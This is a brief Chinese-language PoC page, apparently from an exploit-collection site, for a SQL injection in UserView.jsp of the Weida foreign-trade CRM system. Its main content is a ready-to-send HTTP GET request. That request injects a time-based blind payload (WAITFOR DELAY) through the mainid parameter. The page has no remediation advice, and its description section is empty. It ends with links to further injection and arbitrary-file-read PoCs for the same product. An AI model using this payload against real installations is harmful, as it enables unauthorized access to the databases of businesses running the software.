维达外贸客户关系管理系统 UserView.jsp SQL注入漏洞

漏洞描述

PoC代码

GET /wap/common/admin/UserView.jsp?mainid=1%27%3BWAITFOR+DELAY+%270%3A0%3A8%27--%2Bq HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

相关漏洞推荐

• POC 维达外贸客户关系管理系统 sendmailRun1.jsp SQL注入漏洞
• 维达外贸客户关系管理系统 AccountPassword SQL注入漏洞
• 维达外贸客户关系管理系统 FileDowload 任意文件读取漏洞
• 维达外贸客户关系管理系统 LodopDown 任意文件读取漏洞
• POC 维达外贸客户关系管理系统FileDowload存在任意文件读取漏洞
• 维达外贸客户关系管理系统 AccountSelect SQL注入漏洞
• POC 维达外贸客户关系管理系统LodopDown存在任意文件读取漏洞
• 维达外贸客户关系管理系统AccountAction.jsp存在SQL注入漏洞
• 维达外贸客户关系管理系统AccountPassword.jsp存在SQL注入漏洞
• POC 维达外贸客户关系管理系统 AccountSelect 存在SQL注入漏洞
• POC 维达外贸客户关系管理系统 sendmailview.jsp存在SQL注入漏洞